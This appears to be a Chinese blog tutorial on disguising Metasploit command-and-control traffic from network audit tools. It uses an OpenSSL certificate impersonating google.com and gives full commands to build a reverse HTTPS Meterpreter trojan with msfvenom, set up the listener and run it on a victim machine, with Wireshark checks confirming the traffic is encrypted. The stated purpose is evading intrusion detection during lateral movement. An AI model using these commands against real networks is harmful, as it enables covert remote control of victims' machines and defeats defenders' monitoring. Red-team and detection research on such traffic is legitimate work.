前言

如今大多数企业的内网都部署了流量审计服务, 用来专门分析流量特征, 比如后门特征和行为特征

若直接使用Metasploit对内网进行横向渗透, 其产生的流量会很容易被内网防护工具检测出来, 因此需对流量进行加密来绕过检测

这里介绍使用OpenSSL对MSF流量进行加密

演示步骤

1.OpenSSL创建证书SSL/TLS证书

在攻击机Kali输入如下命令生成www..google.com.pem证书文件

openssl req -new -newkey rsa:4096 -days 365 -nodes -x509 \

-subj "/C=UK/ST=London/L=London/O=Development/CN=www.google.com" \

-keyout www.google.com.key \

-out www.google.com.crt && \

cat www.google.com.key www.google.com.crt > www.google.com.pem && \

rm -f www.google.com.key www.google.com.crt

在当前目录查看生成的证书文件: cat www..google.com.pem

2.生成MSF木马

在证书文件所在目录输入如下命令生成msf木马

msfvenom -p windows/meterpreter/reverse_winhttps LHOST=192.168.47.134 LPORT=443 PayloadUUIDTracking=true HandlerSSLCert=www.google.com.pem StagerVerifySSLCert=true PayloadUUIDName=ParanoidStagedPSH -f exe -o msf.exe

3.MSF开启监听

此处配置监听还需设置两个额外选项:

set handlersslcert: 设置处理程序时将使用的证书set StagerVerifySSLCert: 设置接收到连接时执行SSL证书验证

msf5 > use exploit/multi/handler

[*] Using configured payload generic/shell_reverse_tcp

msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_winhttps

payload => windows/meterpreter/reverse_winhttps

msf5 exploit(multi/handler) > set lhost 192.168.47.134

lhost => 192.168.47.134

msf5 exploit(multi/handler) > set lport 443

lport => 443

msf5 exploit(multi/handler) > set handlersslcert /root/www.google.com.pem

handlersslcert => /root/www.google.com.pem

msf5 exploit(multi/handler) > set stagerverifysslcert true

stagerverifysslcert => true

访问https://192.168.47.134, 查看此网页的证书

4.受害机上线

将msf木马丢到受害机中运行, 随后msf服务端收到目标主机的meterpreter会话

注意: 经过测试, 操作系统为win7的受害机不会上线

抓包分析

先在meterpreter会话命令行随便输条指令, 这里输入getuid

随后打开wireshark抓取msf服务端与受害机之间的流量数据包, 可发现此流量使用了TLS协议加密

追踪TCP流, 在tls加密前这里的数据是明文数据, 而现在是加密后的乱码数据

精彩链接

评论可见,请评论后查看内容,谢谢!!!
 您阅读本篇文章共花了: